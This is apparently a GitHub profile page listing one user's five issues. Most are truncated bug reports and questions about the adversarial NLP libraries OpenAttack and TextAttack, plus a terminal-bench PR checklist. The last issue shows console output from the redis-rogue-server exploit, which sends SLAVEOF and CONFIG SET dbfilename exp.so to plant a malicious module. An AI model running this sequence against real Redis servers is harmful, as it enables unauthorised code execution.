Results 5 issues of Di Lu

- 对于英文语言 PWWSAttacker 初始化报错。如果设置lang=“chinese”则没有问题 ``` >>> attacker = OpenAttack.attackers.PWWSAttacker() Traceback (most recent call last): File "/root/miniconda3/envs/dylu/lib/python3.8/urllib/request.py", line 1354, in do_open h.request(req.get_method(), req.selector, req.data, headers, File "/root/miniconda3/envs/dylu/lib/python3.8/http/client.py", line 1256, in request...

I would like to employ TextAttack for further research. does TextAttack support setting attack range of input text?

question

the latest attack recipe TextAttack implement is "a2t"(2021). Attack methods in recent 2 years are not available. Would author develop more recent recipes :)

enhancement

**If your PR is adding a new task to terminal-bench-core, please complete this by adding an "x" next to each applicable item. If you are not adding a new task,...

``` # python3 redis-master.py -r localhost -p 6379 -L localhost -P 11122 -f ../redis-rogue-server/exp.so >> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$9\r\nlocalhost\r\n$5\r\n11122\r\n' >> receive data: b'-NOAUTH Authentication required.\r\n' >> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n' >> receive...